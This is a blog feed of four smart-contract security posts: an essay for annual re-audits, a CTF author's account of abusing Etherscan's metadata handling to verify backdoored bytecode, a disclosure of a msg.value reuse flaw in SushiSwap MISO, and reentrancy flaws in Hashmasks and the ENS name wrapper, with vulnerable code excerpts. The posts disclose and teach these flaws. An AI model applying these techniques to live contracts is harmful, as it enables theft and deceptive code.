<![CDATA[samczsun]]>https://samczsun.com/https://samczsun.com/favicon.pngsamczsunhttps://samczsun.com/Ghost 5.121Fri, 20 Mar 2026 07:09:50 GMT60<![CDATA[Higher Bug Bounties Won’t Stop Hacks]]>https://samczsun.com/higher-bug-bounties-wont-stop-hacks/69372395c240920001bc075aWed, 10 Dec 2025 17:33:17 GMT

Although projects can always choose to go above and beyond, it is well understood today that there are three key steps to crypto security: write tests to ensure that basic mistakes are caught during development, use audits and contests to conduct a comprehensive review prior to deployment, and set up a bug bounty program to incentivize and reward researchers who prevent exploits by responsibly disclosing vulnerabilities. The normalization of these best practices has significantly reduced the number of vulnerabilities that make it on-chain, forcing attackers to focus their efforts on off-chain vulnerabilities, such as private key theft or infrastructure compromise.

However, every so often, a thoroughly audited protocol offering a significant bug bounty is hacked, with the resulting fallout impacting not only the protocol itself, but trust in the ecosystem as a whole. The recent Yearn and Balancer V2 hacks, as well as the Abracadabra and 1inch hacks from earlier this year, show that not even battle-tested protocols are safe. Is there any way that the crypto industry could have avoided these hacks, or is this just a consequence of decentralized finance?

Commentators often suggest that a higher bug bounty would have protected these protocols, but even setting aside economic reality, bug bounties are a passive security measure which places the fate of the protocol in the hands of whitehats, while audits represent the protocol actively taking measures to ensure their own security. Higher bug bounties won’t stop hacks because it’s just doubling down on the gamble that a whitehat will find the bug before a blackhat does. If protocols want to protect themselves, they need to proactively conduct re-audits instead.

Treasury vs TVL

Sometimes a hacker agrees to return a majority of stolen funds in exchange for keeping a small portion, typically 10%. Regrettably, the industry has termed this a “whitehat bounty”, which invites the question of why protocols don’t simply offer the same amount through their bug bounty program and avoid the hassle of negotiating. However, this intuition conflates dollars that can be stolen by an attacker with dollars that can be spent by a protocol.

Although a protocol appears to be able to tap into both pools of dollars for security purposes, protocols have the legal authority to spend dollars out of their own treasury but no legal authority to spend dollars that users have deposited. Users are also extremely unlikely to grant protocols permission ahead of time, and only when the situation is dire (i.e. depositors must choose between losing 10% of their deposit or losing 100% of their deposit) is there an implicit agreement that protocols now have permission to leverage deposits in negotiations. In other words, risk scales according to TVL but the security budget does not.

Capital Efficiency

Even if the protocol is well funded, either because it has a large treasury, is profitable, or because it has instituted a security fee policy, the question of how to allocate those funds for the sake of security still remains. When compared to investing in a re-audit, raising bug bounties is extremely capital inefficient at best and introduces misaligned incentives between protocols and researchers at worst.

If bounties scale with TVL, there is a clear incentive to hold onto critical vulnerabilities if the researcher suspects that the protocol will grow in TVL and that the odds of a duplicate are low. This dynamic ultimately pits researchers directly against protocols to the detriment of their users. Simply increasing critical bounty payouts is unlikely to have the desired effect either; the pool of freelance researchers is large, but the number of people who dedicate a majority of their time to bug bounties and are also sufficiently skilled to find vulnerabilities within complex protocols is much smaller, and these elite researchers focus their time on bounties which are most likely to generate a return on their time investment. For large battle-tested protocols, the probability of finding a bug feels so minuscule due to the presumed constant attention from hackers and other researchers that there simply is no dollar amount which would make it worth the effort. If such a dollar amount did exist, it would be so high as to be impractical.

Meanwhile, from a protocol’s perspective, a bug bounty represents an amount of money which has been reserved for the purpose of paying for a single critical vulnerability. Unless a protocol is willing to bet that absolutely no critical vulnerabilities will be found while also misleading researchers about their liquidity, then this money cannot be spent elsewhere. Rather than passively waiting for a researcher to uncover a critical vulnerability, the same dollar amount could be used to fund multiple re-audits over a period of years. Each re-audit guarantees attention from top-tier researchers and is not artificially limited to a single finding, and also aligns incentives between researchers and protocols: both parties will suffer reputational harm if the protocol is exploited.

Existing Precedent

In the software and financial industries, audits which expire annually are a tried and true practice, offering the best way to communicate whether or not a company is keeping up with the evolving threat landscape. SOC 2 Type II reports are used by B2B customers to determine if a vendor is maintaining proper security controls, PCI DSS certifications show that a company is taking proper care to maintain sensitive payments information, and FedRAMP certifications are required by the US government to maintain a high bar for anyone who has access to government information.

Although the smart contracts themselves are immutable, the environment is not. Configuration settings may change over time, dependencies may be upgraded, and code patterns previously thought to be safe may actually be harmful. When a protocol gets audited, it is an assessment of the security posture at the time of the audit, not a forward-looking guarantee that a protocol will remain secure. The only way to refresh the assessment is to perform a re-audit.

In 2026, the crypto industry should adopt annual re-audits as the fourth step in securing a protocol. Existing protocols with significant TVL should conduct a re-audit of their deployment, audit firms should offer specialized re-audit services that focus on evaluating the entire deployment, and the ecosystem should collectively start treating audit reports as what they are: a point-in-time assessment of security which can expire, not a permanent guarantee of security.

Thanks to Dickson Wu, Josselin Feist, cts (@gf_256), Andrew MacPherson, pcaversaccio, Jack Sanford, and David Desjardins for their feedback.

]]>
<![CDATA[Hiding in Plain Sight]]>https://samczsun.com/hiding-in-plain-sight/617acf9a5614960001a98527Thu, 11 Nov 2021 14:19:31 GMT

I like challenging assumptions.

I like trying to do the impossible, finding what others have missed, and blowing people's minds with things they never saw coming. Last year, I wrote a challenge for Paradigm CTF 2021 based on a very obscure Solidity bug. While one variation had been publicly disclosed, the vulnerability I exploited had never really been discussed. As a result, almost everyone who tried the challenge was stumped by the seemingly impossible nature of it.

A few weeks ago, we were discussing plans around Paradigm CTF 2022 when Georgios tweeted out a teaser tweet. I thought it would be incredibly cool to drop a teaser challenge on the same day as the kickoff call. However, it couldn't just be any old teaser challenge. I wanted something out of this world, something that no one would see coming, something that pushed the limits of what people could even imagine. I wanted to write the first Ethereum CTF challenge that exploited an 0day.

How It's Made: 0days

As security researchers, there are a few base assumptions we make in order to optimize our time. One is that the source code we're reading really did produce the contract we're analyzing. Of course, this assumption only holds if we're reading the source code from somewhere trusted, like Etherscan. Therefore, if I could figure out a way to have Etherscan verify something incorrectly, I would be able to design a really devious puzzle around it.

In order to figure out how to exploit Etherscan's contract verification system, I had to verify some contracts. I deployed a few contracts to Ropsten to play around with and tried verifying them. Immediately, I was greeted with the following screen.

Hiding in Plain Sight

I selected the correct settings and moved onto the next screen. Here, I was asked to provide my contract source code.

Hiding in Plain Sight

I put in the source code and clicked verify. Sure enough, my source code was now attached to my contract.

Hiding in Plain Sight

Now that I knew how things worked, I could start playing around with the verification process. The first thing I tried was deploying a new contract with foo changed to bar and verifying that contract with the original source code. Unsurprisingly, Etherscan refused to verify my contract.

Hiding in Plain Sight

However, when I manually compared the two bytecode outputs, I noticed something strange. Contract bytecode is supposed to be hex, but there was clearly some non-hex in there.

Hiding in Plain Sight

I knew that Solidity appended contract metadata to the deployed bytecode, but I never really considered how it affects contract verification. Clearly, Etherscan was scanning through the bytecode for the metadata and then replacing it with a marker that said, "Anything in this region is allowed to be different, and we'll still consider it the same bytecode."

This seemed like a promising lead for a potential 0day. If I could trick Etherscan into interpreting non-metadata as metadata, then I would be able to tweak my deployed bytecode in the region marked {ipfs} while still having it verify as the legitimate bytecode.

The easiest way I could think of to include some arbitrary bytecode in the creation transaction was to encode them as constructor arguments. Solidity encodes constructor arguments by appending their ABI-encoded forms directly onto the create transaction data.

Hiding in Plain Sight

However, Etherscan was too smart, and excluded the constructor arguments from any sort of metadata sniffing. You can see that the constructor arguments are italicized, to indicate that they're separate from the code itself.

Hiding in Plain Sight

This meant I would need to somehow trick the Solidity compiler into emitting a sequence of bytes that I controlled, so I could make it resemble the embedded metadata. However, this seemed like a nightmare of a problem to solve, since I would have almost no control over the opcodes or bytes that Solidity chooses to use without some serious compiler wrangling, after which the source code would look extremely suspicious.

I considered this problem for a while, until it hit me: it was actually extremely easy to cause Solidity to emit (almost) arbitrary bytes. The following code will cause Solidity to emit 32 bytes of 0xAA.

bytes32 value = 0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;

Motivated, I quickly wrote a small contract which would push a series of constants in such a way that Solidity would emit bytecode which exactly resembled the embedded metadata.

Hiding in Plain Sight

To my delight, Etherscan marked the presence of an IPFS hash in the middle of my contract, where no embedded metadata should ever be found.

Hiding in Plain Sight

I quickly copied the expected bytecode and replaced the IPFS hash with some random bytes, then deployed the resulting contract. Sure enough, Etherscan considered the differing bytes business as usual, and allowed my contract to be verified.

Hiding in Plain Sight

With this contract, the source code suggests that a simple bytes object should be returned when calling example(). However, if you actually try to call it, this happens.

$ seth call 0x3cd2138cabfb03c8ed9687561a0ef5c9a153923f 'example()'
seth-rpc: {"id":1,"jsonrpc":"2.0","method":"eth_call","params":[{"data":"0x54353f2f","to":"0x3CD2138CAbfB03c8eD9687561a0ef5C9a153923f"},"latest"]}
seth-rpc: error:   code       -32000
seth-rpc: error:   message    stack underflow (5 <=> 16)

I had successfully discovered an 0day within Etherscan, and now I could verify contracts which behaved completely differently from what the source code suggested. Now I just needed to design a puzzle around it.

A false start

Clearly, the puzzle would revolve around the idea that the source code as seen on Etherscan was not how the contract would actually behave. I also wanted to make sure that players couldn't simply replay transactions directly, so the solution had to be unique per-address. The best way to do this was obviously to require a signature.

But in what context would players be required to sign some data? My first design was a simple puzzle with a single public function. Players would call the function with a few inputs, sign the data to prove they came up with the solution, and if the inputs passed all the various checks then they would be marked as a solver. However, as I fleshed out this design over the next few hours, I quickly grew dissatisfied with how things were turning out. It was starting to become very clunky and inelegant, and I couldn't bear the idea of burning such an awesome 0day on a such a poorly designed puzzle.

Resigning myself to the fact that I wouldn't be able to finish this in time for Friday, I decided to sleep on it.

Pinball

I continued trying to iterate on my initial design over the weekend, but made no more progress. It was like I'd hit a wall with my current approach, and even though I didn't want to admit it, I knew that I'd likely have to start over if I wanted something I'd be satisfied with.

Eventually, I found myself reexamining the problem from first principles. What I wanted was a puzzle where players had to complete a knowledge check of sorts. However, there was no requirement that completing the knowledge check itself was the win condition. Rather, it could be one of many paths that the player is allowed to take. Perhaps players could rack up points throughout the puzzle, with the exploit providing some sort of bonus. The win condition would simply be the highest score, therefore indirectly encouraging use of the exploit.

I thought back to a challenge I designed last year, Lockbox, which forced players to construct a single blob of data which would meet requirements imposed by six different contracts. The contracts would apply different constraints on the same bytes, forcing players to be clever in how they constructed their payload. I realized I wanted to do something similar here, where I would require players to submit a single blob of data and I would award points based on certain sections of data meeting specific requirements.

It was at this point that I realized I was basically describing pinboooll, a challenge I worked on during the finals of DEFCON CTF 2020. The gimmick with pinboooll was that when you executed the binary, execution would bounce around the control flow graph similar to how a ball bounces around in a pinball machine. By constructing the input correctly, you would be able to hit specific sections of code and rack up points. Of course, there was an exploit involved as well, but frankly speaking I'd already forgotten what it was and I had no intention of trying to find it again. Besides, I already had my own exploit I wanted to use.

Since I was handling a live 0day here, I decided that I wanted to get the puzzle out as soon as possible, even if it meant compromising on how much of someone else's work I'd be copying. In the end, I spent a few hours refreshing myself on how pinboooll worked and a few days re-implementing it in Solidity. This took care of the scaffolding of the puzzle, now I just had to integrate the exploit.

Weaponizing an 0day

My approach to getting Solidity to output the right bytes had always been to just load several constants and have Solidity emit the corresponding PUSH instructions. However, such arbitrary constants would likely be a huge red flag and I wanted something that would blend in slightly better. I also had to load all the constants in a row, which would be hard to explain in actual code.

Because I really only needed to hardcode two sequences of magic bytes (0xa264...1220 and 0x6473...0033) I decided to see if I could sandwich code between them, instead of a third constant. In the deployed contract, I would just swap out the sandwiched code with some other instructions.

address a = 0xa264...1220;

uint x = 1 + 1 + 1 + ... + 1;

address b = 0x6473...0033;

After some experimentation, I found it would be possible, but only if the optimizer was enabled. Otherwise, Solidity emits too much value cleanup code. This was acceptable, so I moved on to refining the code itself.

I would only be able to modify the code within the two addresses, but it would be weird to see a dangling address at the end, so I decided to use them in conditionals instead. I also had to justify the need for the second conditional, so I threw in a little score bonus in the end. I made the first conditional check that the tx.origin matched a hardcoded value to give people the initial impression that there was no point pursuing this code path any further.

if (tx.origin != 0x13378bd7CacfCAb2909Fa2646970667358221220) return true;

state.rand = 0x40;
state.location = 0x60;

if (msg.sender != 0x64736F6c6343A0FB380033c82951b4126BD95042) return true;

state.baseScore += 1500;

Now that the source code was all prepared, I had to write the actual backdoor. My backdoor would need to verify that the player triggered the exploit correctly, fail silently if they didn't, and award them a bonus if they did. I wanted to make sure the exploit couldn't be easily replayed, so I decided on simply requiring the player to sign their own address and to submit the signature in the transaction. For extra fun, I decided to require the signature to be located at offset 0x44 in the transaction data, where the ball would typically begin. This would require players to understand how ABI encoding works and to manually relocate the ball data elsewhere.

However, here I ran into a big problem: it's simply not possible to fit all of this logic into 31 bytes of hand-written assembly. Fortunately, after some consideration, I realized that I had another 31 bytes to play with. After all, the real embedded metadata contained another IPFS hash that Etherscan would also ignore.

After some code golfing, I arrived at a working backdoor. In the first IPFS hash, I would immediately pop off the address that just got pushed, then jump to to the second IPFS hash. There, I would hash the caller and partially set up the memory/stack for a call to ecrecover. Then I would jump back to the first IPFS hash where I finish setting up the stack and perform the call. Finally, I set the score multiplier to be equal to (msg.sender == ecrecover()) * 0x40 + 1, which meant that no additional branching was needed.

After code golfing the backdoor down to size, I tweeted out my Rinkeby address in order to get some testnet ETH from the faucet, and to drop a subtle hint to anyone watching Twitter that something might be coming. Then, I deployed the contract and verified it.

Hiding in Plain Sight

Now all that was left to do was wait for someone to discover the backdoor that was hiding in plain sight.

]]>
<![CDATA[Two Rights Might Make A Wrong]]>https://samczsun.com/two-rights-might-make-a-wrong/611c07f27c20580001fdeb0fTue, 17 Aug 2021 19:41:02 GMT

A common misconception in building software is that if every component in a system is individually verified to be safe, the system itself is also safe. Nowhere is this belief better illustrated than in DeFi, where composability is second nature to developers. Unfortunately, while composing two components might be safe most of the time, it only takes one vulnerability to cause serious financial damage to hundreds if not thousands of innocent users. Today, I’d like to tell you about how I found and helped patch a vulnerability that put over 109k ETH (~350 million USD at today’s exchange rate) at risk.

The Encounter

9:42 AM

I was offhandedly browsing through the LobsterDAO group on Telegram when I noticed a discussion between @ivangbi_ and @bantg about a new raise on SushiSwap’s MISO platform. I typically try to avoid drama in public, but I couldn’t help but do a quick Google search to see what it was all about. The results I got back weren’t particularly interesting to me, but I pressed onward, driven by a feeling there was something interesting to be found here if I just kept looking.

The MISO platform operates two types of auctions: Dutch auctions and batch auctions. In this case, the raise was being held with a Dutch auction. Naturally, the first thing I did was open up the contract on Etherscan.

9:44 AM

I quickly skimmed through the DutchAuction contract per the participation agreement and checked each interesting function. The commit functions (commitEth, commitTokens, and commitTokensFrom) all seemed to be implemented correctly. The auction management functions (setDocument, setList, etc) also had the proper access controls. However, near the bottom I noticed that the initMarket function had no access controls, which was extremely concerning. Furthermore, the initAuction function it called also contained no access control checks.

I didn’t really expect this to be a vulnerability though, since I didn’t expect the Sushi team to make such an obvious misstep. Sure enough, the initAccessControls function validated that the contract had not already been initialized.

However, this led me to another discovery. While scrolling through all of the files, I noticed the SafeTransfer and BoringBatchable libraries. I was familiar with both of these, and I was immediately struck with the potential that the BoringBatchable library introduced.

For those who aren’t familiar, BoringBatchable is a mixin library which is designed to easily introduce batch calls to any contract which imports it. It does this by performing a delegatecall on the current contract for each call data provided in the input.

    function batch(bytes[] calldata calls, bool revertOnFail) external payable returns (bool[] memory successes, bytes[] memory results) {
        successes = new bool[](calls.length);
        results = new bytes[](calls.length);
        for (uint256 i = 0; i < calls.length; i++) {
            (bool success, bytes memory result) = address(this).delegatecall(calls[i]);
            require(success || !revertOnFail, _getRevertMsg(result));
            successes[i] = success;
            results[i] = result;
        }
    }

Looking at this function, it appeared to be implemented correctly. However, something in the corner of my mind was nagging at me. That’s when I realized I had seen something very similar in the past.

The Discovery

9:47 AM

A little over a year ago today, I was in a Zoom call with the Opyn team, trying to figure out how to recover and protect user funds after a devastating hack. The hack itself was simple but genius: it exercised multiple options using a single payment of ETH because the Opyn contracts used the msg.value variable in a loop. While processing token payments involved a separate transferFrom call for each loop iteration, processing ETH payments simply checked whether msg.value was sufficient. This allowed the attacker to reuse the same ETH multiple times.

I realized that I was looking at the exact same vulnerability in a different form. Inside a delegatecall, msg.sender and msg.value are persisted. This meant that I should be able to batch multiple calls to commitEth and reuse my msg.value across every commitment, allowing me to bid in the auction for free.

9:52 AM

My instincts were telling me that this was the real deal, but I couldn’t be sure without verifying it. I quickly opened up Remix and wrote a proof-of-concept. To my dismay, my mainnet fork environment was completely busted. I must’ve accidentally broken it during the London hard fork. With how much money was at risk though, I didn’t have the luxury of time. I quickly threw together a poor man’s mainnet fork on the command line and tested my exploit. It worked.

10:13 AM

I pinged my colleague, Georgios Konstantopoulos, to get a second pair of eyes on this before reporting it. While I waited for a response, I went back to the contract to look for ways to elevate the severity. It was one thing to be able to participate in the auction for free, but it would be another to be able to steal all of the other bids too.

I had noticed there was some refund logic during my initial scan but thought little of it. Now, it was a way to get ETH out of the contract. I quickly checked what conditions I would need to meet in order to get the contract to provide me with a refund.

To my surprise (and horror), I found that a refund would be issued for any ETH sent which went over the auction’s hard cap. This applied even once the hard cap was hit, meaning that instead of rejecting the transaction altogether, the contract would simply refund all of your ETH instead.

Suddenly, my little vulnerability just got a lot bigger. I wasn’t dealing with a bug that would let you outbid other participants. I was looking at a 350 million dollar bug.

The Disclosure

10:38 AM

After verifying the bug with Georgios, I asked him and Dan Robinson to try and reach out to Joseph Delong from Sushi. Within minutes, Joseph had responded and I found myself in a Zoom call with Georgios, Joseph, Mudit, Keno, and Omakase. I quickly debriefed the participants on the vulnerability and they left to coordinate a response. The entire call lasted mere minutes.

11:10 AM

Joseph got back to Georgios and I with a Google Meet room. I joined as Georgios was in the middle of debriefing Joseph, Mudit, Keno, and Omakase, as well as Duncan and Mitchell from Immunefi. We quickly discussed next steps.

We had three options:

  1. Leave the contract and hope no one notices
  2. Rescue the funds using the exploit, probably using Flashbots to hide the transaction
  3. Rescue the funds by purchasing the remaining allocation and immediately finalizing the auction, requiring admin permissions

After some quick debate, we decided that option 3 was the cleanest approach. We broke out into separate rooms in order to work on comms and ops separately.

The Preparation

11:26 AM

Inside the ops room, Mudit, Keno, Georgios, and I were busy writing a simple rescue contract. We decided that it would be cleanest to take a flash loan, purchase up to the hard cap, finalize the auction, then repay the flash loan using proceeds from the auction itself. This would require no upfront capital, which was very nice.

12:54 PM

We ran into a problem. What was originally supposed to be a simple rescue operation had just turned into a ticking time bomb that couldn’t be defused, because there was another active auction. This was a batch auction, which meant that we couldn’t just buy up to the hard cap because there was no hard cap at all. Fortunately, the lack of a hard cap also meant there was no way to drain ETH from the contract because no refunds were offered.

We quickly discussed the pros and cons of performing a whitehat rescue on the first contract and ultimately decided that even though the batch auction had 8 million USD committed, those 8 million USD weren’t at risk, while the 350 million USD in the original Dutch auction was very much still at risk. Even if someone was tipped off by our forced halting of the Dutch auction and found the bug in the batch auction, we would still save the majority of the money. The call to proceed was made.

1:36 PM

As we wrapped up work on the rescue contract, we discussed next steps for the batch auction. Mudit pointed out that there was a points list which could be set even while the auction was live, and it was called during each ETH commitment. We immediately realized this could be the pause function we were looking for.

We brainstormed different ways to make use of this hook. Immediately reverting was an obvious solution, but we wanted something better. I considered adding a check that every origin could only make one commitment per block, but we noticed that the function was marked as view, which meant that the Solidity compiler would have used a static call opcode. Our hook wouldn’t be allowed to make any state modifications.

After some more thinking, I realized that we could use the points list to verify that the auction contract had enough ETH to match the commitments being made. In other words, if someone tried to exploit this bug, then there would be more commitments than there was ETH. We could easily detect this and revert the transaction. Mudit and Keno began working on writing a test to verify.

The Rescue

2:01 PM

The comms breakout team merged with the ops breakout team to sync on progress. They had made contact with the team performing the raise, but the team wanted to finalize the auction manually. We discussed the risks and agreed that there was minimal likelihood that an automated bot would notice the transaction or be able to do anything about it.

2:44 PM

The team performing the raise finalized the auction, neutralizing the immediate threat. We congratulated each other and went our separate ways. The batch auction would finalize later in the day to little fanfare. No one outside of the circle of trust knew what scale of crisis had just been averted.

The Reflection

4:03 PM

The past few hours feel like a blur, almost as though no time has passed at all. I had gone from encounter to discovery in a little over half an hour, disclosure in 20 minutes, war room in another 30, and a fix in three hours. All in all, it took only five hours to protect 350 million USD from falling into the wrong hands.

Even though there was no monetary damage, I’m sure that everyone involved would have much preferred to not have gone through this process in the first place. To that end, I have two main takeaways for you.

First, using msg.value in complex systems is hard. It’s a global variable that you can’t change and persists across delegate calls. If you use msg.value to check that payment was received, you absolutely cannot place that logic in a loop. As a codebase grows in complexity, it’s easy to lose track of where that happens and accidentally loop something in the wrong place. Although wrapping and unwrapping of ETH is annoying and introduces extra steps, the unified interface between WETH and other ERC20 tokens might be well worth the cost if it means avoiding something like this.

Second, safe components can come together to make something unsafe. I’ve preached this before in the context of composability and DeFi protocols, but this incident shows that even safe contract-level components can be mixed in a way that produces unsafe contract-level behavior. There’s no catch-all advice to apply here like “check-effect-interaction,” so you just need to be cognizant of what additional interactions new components are introducing.

I’d like to thank Sushi contributors, Joseph, Mudit, Keno, and Omakase for their extremely quick response to this issue as well as my colleagues Georgios, Dan, and Jim for their help throughout this process, including reviewing this post.

]]>
<![CDATA[The Dangers of Surprising Code]]>https://samczsun.com/the-dangers-of-surprising-code/6102f018532b7c00017e5f04Fri, 13 Aug 2021 19:52:42 GMT

If you work in software engineering, odds are you've heard of at least one software engineering principle. While I wouldn't advocate for religiously following every principle to the letter, there are a few that are really worth paying attention to.

The one I want to talk about today is the principle of least astonishment. It has a fancy name but is a really simple idea. All it says is that when presented with code that claims to do something, most users will make assumptions regarding how it behaves to get that thing done. As such, your job as the developer is to write your code to match those assumptions so that your users don't get a nasty surprise.

This is a good principle to follow because developers like making assumptions about things. If you export a function called calculateScore(GameState), a lot of people are going to rightly assume that the function will only read from the game state. If you also mutate the game state, you'll surprise a lot of very confused people trying to figure out why their game state is randomly getting corrupted. Even if you put it in the documentation, there's still no guarantee that people will see it, so it's best to just ensure your code isn't surprising in the first place.

Safer Is Better, Right?

When the ERC-721 standard was being drafted, back in the beginning of 2018, a suggestion was made to implement transfer security to ensure that tokens wouldn't be stuck in recipient contracts that weren't designed to handle them. To do this, the proposal authors modified the behavior of the transfer function to check the recipient for whether they were capable of supporting the token transfer. They also introduced the unsafeTransfer function which would bypass this check, should the sender so desire.

However, due to concerns about backwards compatibility, the functions were renamed in a subsequent commit. This made the transfer function behave the same for both an ERC-20 and an ERC-721 token. However, now the recipient checking needed to be moved elsewhere. As such, the safe class of functions was introduced: safeTransfer and safeTransferFrom.

This was a solution for a legitimate problem, as there have been numerous examples of ERC-20 tokens being accidentally transferred to contracts that never expected to receive tokens (one particularly common mistake was to transfer tokens to the token contract itself, locking it forever). It's no surprise then that when the ERC-1155 standard was being drafted, it took inspiration from the ERC-721 standard by including recipient checks not only on transfer but on mint as well.

These standards mostly sat dormant for the next few years while ERC-20 maintained its popularity, but recently a spike in gas costs as well as interest in NFTs means that the ERC-721 and ERC-1155 standards have seen a spike in developer usage. With all this renewed interest, it sure is fortunate that these standards were designed with safety in mind, right?

Safer Is Better, Right?

Ok, but what exactly does it mean for a transfer or mint to be safe? Different parties have different interpretations of safety. For a developer, a safe function might mean that it doesn't contain any bugs or introduce additional security concerns. For a user, it could mean that it contains additional guardrails to protect them from accidentally shooting themselves in the foot.

It turns out that in this case, these functions are more of the latter and less of the former. This is especially unfortunate because given the choice between transfer and safeTransfer, why wouldn't you pick the safe one? It's in the name!

Well, one reason might be our old friend reentrancy, or as I've been trying my hardest to rebrand it to: unsafe external calls. Recall that any external call is potentially unsafe if the recipient is attacker-controlled because the attacker may be able to cause your contract to transition into an undefined state. By design, these "safe" functions perform an external call to the recipient of the tokens, which is often controlled by the sender during a mint or transfer. In other words, this is practically a textbook example of an unsafe external call.

But, you might ask yourself, what's the worst that could happen from allowing a recipient contract to reject a transfer that they weren't able to process? Well, allow me to answer that question with two quick case studies.

Hashmasks

Hashmasks are NFTs with a limited supply. Users were able to purchase up to 20 masks per transaction, although they've been sold out for months already. Here's the function to buy masks:

function mintNFT(uint256 numberOfNfts) public payable {
    require(totalSupply() < MAX_NFT_SUPPLY, "Sale has already ended");
    require(numberOfNfts > 0, "numberOfNfts cannot be 0");
    require(numberOfNfts <= 20, "You may not buy more than 20 NFTs at once");
    require(totalSupply().add(numberOfNfts) <= MAX_NFT_SUPPLY, "Exceeds MAX_NFT_SUPPLY");
    require(getNFTPrice().mul(numberOfNfts) == msg.value, "Ether value sent is not correct");

    for (uint i = 0; i < numberOfNfts; i++) {
        uint mintIndex = totalSupply();
        if (block.timestamp < REVEAL_TIMESTAMP) {
            _mintedBeforeReveal[mintIndex] = true;
        }
        _safeMint(msg.sender, mintIndex);
    }

    /**
    * Source of randomness. Theoretical miner withhold manipulation possible but should be sufficient in a pragmatic sense
    */
    if (startingIndexBlock == 0 && (totalSupply() == MAX_NFT_SUPPLY || block.timestamp >= REVEAL_TIMESTAMP)) {
        startingIndexBlock = block.number;
    }
}

If you weren't expecting it, then this function might seem perfectly reasonable. However, as you might have predicted, there's something sinister hidden inside that _safeMint call. Let's take a look.

    function _safeMint(address to, uint256 tokenId, bytes memory _data) internal virtual {
        _mint(to, tokenId);
        require(_checkOnERC721Received(address(0), to, tokenId, _data), "ERC721: transfer to non ERC721Receiver implementer");
    }

For safety, this function performs a callback to the recipient of the token to check that they're willing to accept the transfer. However, we're the recipient of the token, which means we just got a callback at which point we can do whatever we like, including calling mintNFT again. If we do this, we'll reenter the function after only one mask has been minted, which means we can request to mint another 19 masks. This results in a total of 39 masks being minted, even though the maximum allowable was only 20.

ENS Name Wrapper

More recently, Nick Johnson from ENS reached out about taking a look at their work-in-progress name wrapper for the ENS. The name wrapper allows users to tokenize their ENS domains in a new ERC-1155 token which provides support for fine-grained permissions and a more consistent API.

At a high level, in order to wrap an arbitrary ENS domain (more specifically, any domain that isn't a 2LD .eth domain) you must first approve the name wrapper to access your ENS domain. Then you call wrap(bytes,address,uint96,address) which both mints an ERC-1155 token for you and also takes custody of the underlying ENS domain.

Here's the wrap function itself, it's fairly straightforward. First, we call _wrap which does some logic and returns the hashed domain name. Then we ensure that the transaction sender is indeed the owner of the ENS domain before taking custody of the domain. Note that if the sender does not own the underlying ENS domain, then the entire transaction should revert, undoing any changes made in _wrap.

    function wrap(
        bytes calldata name,
        address wrappedOwner,
        uint96 _fuses,
        address resolver
    ) public override {
        bytes32 node = _wrap(name, wrappedOwner, _fuses);
        address owner = ens.owner(node);

        require(
            owner == msg.sender ||
                isApprovedForAll(owner, msg.sender) ||
                ens.isApprovedForAll(owner, msg.sender),
            "NameWrapper: Domain is not owned by the sender"
        );
        ens.setOwner(node, address(this));
        if (resolver != address(0)) {
            ens.setResolver(node, resolver);
        }
    }

Here's the _wrap function itself. Nothing special going on in here.

    function _wrap(
        bytes memory name,
        address wrappedOwner,
        uint96 _fuses
    ) private returns (bytes32 node) {
        (bytes32 labelhash, uint256 offset) = name.readLabel(0);
        bytes32 parentNode = name.namehash(offset);

        require(
            parentNode != ETH_NODE,
            "NameWrapper: .eth domains need to use wrapETH2LD()"
        );

        node = _makeNode(parentNode, labelhash);

        _mint(node, name, wrappedOwner, _fuses);
        emit NameWrapped(node, name, wrappedOwner, _fuses);
    }

Unfortunately, it's the _mint function itself where unsuspecting developers may be in for a nasty surprise. The ERC-1155 specification states that when minting a token, the recipient should be consulted for whether they're willing to accept the token. Upon digging into the library code (which is lightly modified from the OpenZeppelin base), we see that this is indeed the case.

    function _mint(
        bytes32 node,
        bytes memory name,
        address wrappedOwner,
        uint96 _fuses
    ) internal {
        names[node] = name;

        address oldWrappedOwner = ownerOf(uint256(node));
        if (oldWrappedOwner != address(0)) {
            // burn and unwrap old token of old owner
            _burn(uint256(node));
            emit NameUnwrapped(node, address(0));
        }
        _mint(node, wrappedOwner, _fuses);
    }
    
    function _mint(
        bytes32 node,
        address newOwner,
        uint96 _fuses
    ) internal virtual {
        uint256 tokenId = uint256(node);
        address owner = ownerOf(tokenId);
        require(owner == address(0), "ERC1155: mint of existing token");
        require(newOwner != address(0), "ERC1155: mint to the zero address");
        require(
            newOwner != address(this),
            "ERC1155: newOwner cannot be the NameWrapper contract"
        );
        _setData(tokenId, newOwner, _fuses);
        emit TransferSingle(msg.sender, address(0x0), newOwner, tokenId, 1);
        _doSafeTransferAcceptanceCheck(
            msg.sender,
            address(0),
            newOwner,
            tokenId,
            1,
            ""
        );
    }

But what good does this do for us, exactly? Well, once again we are presented with an unsafe external call that we can use to perform reentrancy. Specifically, notice that during the callback we own the ERC-1155 token representing the ENS domain, but the name wrapper hasn't yet verified that we own the underlying ENS domain itself. This allows us to operate on the ENS domain without actually owning it in the first place. For example, we can ask the name wrapper to unwrap our domain, burning the token we just minted and getting the underlying ENS domain.

    function unwrap(
        bytes32 parentNode,
        bytes32 label,
        address newController
    ) public override onlyTokenOwner(_makeNode(parentNode, label)) {
        require(
            parentNode != ETH_NODE,
            "NameWrapper: .eth names must be unwrapped with unwrapETH2LD()"
        );
        _unwrap(_makeNode(parentNode, label), newController);
    }
    
    function _unwrap(bytes32 node, address newOwner) private {
        require(
            newOwner != address(0x0),
            "NameWrapper: Target owner cannot be 0x0"
        );
        require(
            newOwner != address(this),
            "NameWrapper: Target owner cannot be the NameWrapper contract"
        );
        require(
            !allFusesBurned(node, CANNOT_UNWRAP),
            "NameWrapper: Domain is not unwrappable"
        );

        // burn token and fuse data
        _burn(uint256(node));
        ens.setOwner(node, newOwner);

        emit NameUnwrapped(node, newOwner);
    }

Now that we have the underlying ENS domain, we can do whatever we want with it, such as register new subdomains or set the resolver. When we're done, we just exit the callback. The name wrapper will fetch the current owner of the underlying ENS domain, which is us, and complete the transaction. Just like that, we've taken temporary ownership of any ENS domain the name wrapper is approved for and made arbitrary changes to it.

Conclusion

Code that's surprising may break things in catastrophic ways. In both of these cases, developers who reasonably assumed that the safe class of functions would be (at least as) safe to use instead inadvertently increased their attack surface. As the ERC-721 and ERC-1155 standards become more popular and widespread, it is very likely that this will become an increasingly frequent occurrence. Developers will need to consider the risks of using the safe class of functions and determine how the external call might interact with the code they've written.

]]>
